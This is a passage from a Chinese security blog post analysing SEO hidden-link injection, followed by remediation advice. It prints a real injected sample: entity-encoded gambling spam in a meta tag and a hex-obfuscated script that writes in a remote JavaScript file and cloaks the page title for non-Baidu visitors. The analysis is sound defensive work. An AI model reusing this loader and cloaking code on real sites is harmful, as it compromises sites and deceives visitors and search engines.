class="hljs-attr">name</span>=<span class="hljs-string">&quot;description&quot;</span> <span class="hljs-attr">content</span>=<span class="hljs-string">&quot;<span class="hljs-symbol">&amp;#12304;</span><span class="hljs-symbol">&amp;#49;</span><span class="hljs-symbol">&amp;#49;</span><span class="hljs-symbol">&amp;#48;</span><span class="hljs-symbol">&amp;#48;</span><span class="hljs-symbol">&amp;#107;</span><span class="hljs-symbol">&amp;#97;</span><span class="hljs-symbol">&amp;#105;</span><span class="hljs-symbol">&amp;#46;</span><span class="hljs-symbol">&amp;#99;</span><span class="hljs-symbol">&amp;#111;</span><span class="hljs-symbol">&amp;#109;</span><span class="hljs-symbol">&amp;#12305;</span><span class="hljs-symbol">&amp;#32463;</span><span class="hljs-symbol">&amp;#21271;</span><span class="hljs-symbol">&amp;#20140;</span><span class="hljs-symbol">&amp;#31119;</span><span class="hljs-symbol">&amp;#24425;</span><span class="hljs-symbol">&amp;#23448;</span><span class="hljs-symbol">&amp;#32593;</span><span class="hljs-symbol">&amp;#25480;</span><span class="hljs-symbol">&amp;#26435;</span><span class="hljs-symbol">&amp;#44;</span><span class="hljs-symbol">&amp;#25552;</span><span class="hljs-symbol">&amp;#20379;</span><span class="hljs-symbol">&amp;#21271;</span><span class="hljs-symbol">&amp;#20140;</span><span class="hljs-symbol">&amp;#36187;</span><span class="hljs-symbol">&amp;#36710;</span><span class="hljs-symbol">&amp;#112;</span><span class="hljs-symbol">&amp;#107;</span><span class="hljs-symbol">&amp;#49;</span><span class="hljs-symbol">&amp;#48;</span><span class="hljs-symbol">&amp;#21382;</span><span class="hljs-symbol">&amp;#21490;</span><span class="hljs-symbol">&amp;#35760;</span><span class="hljs-symbol">&amp;#24405;</span><span class="hljs-symbol">&amp;#44;</span><span class="hljs-symbol">&amp;#21271;</span><span class="hljs-symbol">&amp;#20140;</span><span class="hljs-symbol">&amp;#36187;</span><span class="hljs-symbol">&amp;#36710;</span><span class="hljs-symbol">&amp;#112;</span><span class="hljs-symbol">&amp;#107;</span><span class="hljs-symbol">&amp;#49;</span><span class="hljs-symbol">&amp;#48;</span><span class="hljs-symbol">&amp;#24320;</span><span class="hljs-symbol">&amp;#22870;</span><span class="hljs-symbol">&amp;#35270;</span><span class="hljs-symbol">&amp;#39057;</span><span class="hljs-symbol">&amp;#44;</span><span class="hljs-symbol">&amp;#21271;</span><span class="hljs-symbol">&amp;#20140;</span><span class="hljs-symbol">&amp;#36187;</span><span class="hljs-symbol">&amp;#36710;</span><span class="hljs-symbol">&amp;#24320;</span><span class="hljs-symbol">&amp;#22870;</span><span class="hljs-symbol">&amp;#32467;</span><span class="hljs-symbol">&amp;#26524;</span><span class="hljs-symbol">&amp;#26597;</span><span class="hljs-symbol">&amp;#35810;</span><span class="hljs-symbol">&amp;#44;</span><span class="hljs-symbol">&amp;#21271;</span><span class="hljs-symbol">&amp;#20140;</span><span class="hljs-symbol">&amp;#36187;</span><span class="hljs-symbol">&amp;#36710;</span><span class="hljs-symbol">&amp;#112;</span><span class="hljs-symbol">&amp;#107;</span><span class="hljs-symbol">&amp;#49;</span><span class="hljs-symbol">&amp;#48;</span><span class="hljs-symbol">&amp;#22312;</span><span class="hljs-symbol">&amp;#32447;</span><span class="hljs-symbol">&amp;#25237;</span><span class="hljs-symbol">&amp;#27880;</span><span class="hljs-symbol">&amp;#44;</span><span class="hljs-symbol">&amp;#112;</span><span class="hljs-symbol">&amp;#107;</span><span class="hljs-symbol">&amp;#49;</span><span class="hljs-symbol">&amp;#48;</span><span class="hljs-symbol">&amp;#32593;</span><span class="hljs-symbol">&amp;#19978;</span><span class="hljs-symbol">&amp;#24320;</span><span class="hljs-symbol">&amp;#25143;</span><span class="hljs-symbol">&amp;#44;</span><span class="hljs-symbol">&amp;#26368;</span><span class="hljs-symbol">&amp;#19987;</span><span class="hljs-symbol">&amp;#19994;</span><span class="hljs-symbol">&amp;#30340;</span><span class="hljs-symbol">&amp;#21271;</span><span class="hljs-symbol">&amp;#20140;</span><span class="hljs-symbol">&amp;#36187;</span><span class="hljs-symbol">&amp;#36710;</span><span class="hljs-symbol">&amp;#30452;</span><span class="hljs-symbol">&amp;#25773;</span><span class="hljs-symbol">&amp;#32593;</span><span class="hljs-symbol">&amp;#33;</span>&quot;</span>/&gt;</span><br></code></pre></td></tr></table></figure>

<p>解码</p>
<img src="/2024/07/22/%E5%88%9D%E8%AF%86SEO%E6%9A%97%E9%93%BE/5.png" srcset="/img/loading.gif" lazyload class="">

<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs js">&lt;script type=<span class="hljs-string">&quot;text/javascript&quot;</span>&gt; <span class="hljs-variable language_">window</span>[<span class="hljs-string">&quot;\x64\x6f\x63\x75\x6d\x65\x6e\x74&quot;</span>][<span class="hljs-string">&quot;\x77\x72\x69\x74\x65&quot;</span>] (<span class="hljs-string">&#x27;\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x65\x6f\x32\x36\x38\x2e\x73\x75\x2e\x62\x63\x65\x62\x6f\x73\x2e\x63\x6f\x6d\x2f\x31\x31\x30\x30\x6b\x61\x69\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e&#x27;</span>); &lt;<span class="hljs-regexp">/script&gt;&lt;script&gt;if(navigator.userAgent.toLocaleLowerCase().indexOf(&quot;baidu&quot;) == -1)&#123;document.title = &quot;XXXXX科技有限公司&quot;&#125;&lt;/</span>script&gt;<br></code></pre></td></tr></table></figure>

<p>可以看到他调用了JavaScript中的windows对象，然后使用的方法都使用了16进制的编码，因为JavaScript是支持16进制编码的，这样可以躲过一部分简单的检测工具，确实具有一些隐蔽性；后面调用navigator对象中的useragent方法判断用户访问的useragent，如果不是通过百度跳转过来的就将title设置为正常的title。我们将上面这段代码中的16进制编码丢到16进制解密工具中。</p>
<img src="/2024/07/22/%E5%88%9D%E8%AF%86SEO%E6%9A%97%E9%93%BE/6.png" srcset="/img/loading.gif" lazyload class="">

<p>这样可以看到，他其实是使用的window对象中的document.wirte方法，将一段外部JavaScript代码写入到了当前的页面，这样就完成了一段暗链的植入。</p>
<h2 id="暗链修复"><a href="#暗链修复" class="headerlink" title="暗链修复"></a>暗链修复</h2><h3 id="1-识别暗链"><a href="#1-识别暗链" class="headerlink" title="1. 识别暗链"></a>1. <strong>识别暗链</strong></h3><ul>
<li><strong>手动检查</strong>：浏览网站的所有页面和链接，特别是那些内容较多或较旧的页面，寻找任何隐藏的链接。</li>
<li><strong>使用工具</strong>：利用网站扫描工具（如<code>Screaming Frog SEO Spider</code>、<code>Burp Suite</code>、<code>OWASP ZAP</code>）检查站点上的所有链接，寻找隐藏或异常的链接。</li>
<li><strong>查看源代码</strong>：检查网站的源代码和数据库内容，特别是在动态生成内容的地方，寻找可能的暗链。</li>
</ul>
<h3 id="2-清理和修复"><a href="#2-清理和修复" class="headerlink" title="2. 清理和修复"></a>2. <strong>清理和修复</strong></h3><ul>
<li><strong>删除暗链</strong>：从网站的源代码、数据库和所有相关位置中删除识别出的暗链。</li>
<li><strong>修复漏洞</strong>：检查并修复可能导致暗链被插入的安全漏洞，如XSS、SQL注入等。</li>
<li><strong>更新内容管理系统</strong>：如果使用CMS（如WordPress、Joomla），确保所有插件和主题都是最新的，并检查它们是否存在安全漏洞。</li>
</ul>
<h3 id="3-增强安全措施"><a href="#3-增强安全措施" class="headerlink" title="3. 增强安全措施"></a>3. <strong>增强安全措施</strong></h3><ul>
<li><strong>应用安全更新</strong>：确保所有网站软件、插件和主题都是最新的，以修补已知漏洞。</li>
<li><strong>实施输入验证</strong>：加强对所有用户输入的验证和清理，防止恶意代码注入。</li>
<li><strong>使用Web应用防火墙（WAF）</strong>：部署WAF来检测和阻止常见的攻击模式，减少安全漏洞。</li>
</ul>
<blockquote>
<p> 参考：<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/260516.html">https://www.freebuf.com/articles/web/260516.html</a></p>
</blockquote>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/WEB%E6%94%BB%E9%98%B2/" class="category-chain-item">WEB攻防</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%88%9D%E8%AF%86SEO%E6%9A%97%E9%93%BE/" class="print-no-link">#初识SEO暗链</a>
      
    </div>
  
</div>


              

              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/07/21/%E6%B5%85%E8%B0%88CRLF%E6%B3%A8%E5%85%A5/" title="浅谈CRLF注入">
                        <span class="hidden-mobile">浅谈CRLF注入</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"f0DHnqSCglihztWD5hnI8OS8-gzGzoHsz","appKey":"M3h6WgzFRHqbQjc4e8jWn6Ix","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":true,"recordIP":true,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":true},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量 
        <span id="leancloud-site-pv"></span>
         次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数 
        <span id="leancloud-site-uv"></span>
         人
      </span>
    
    

  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
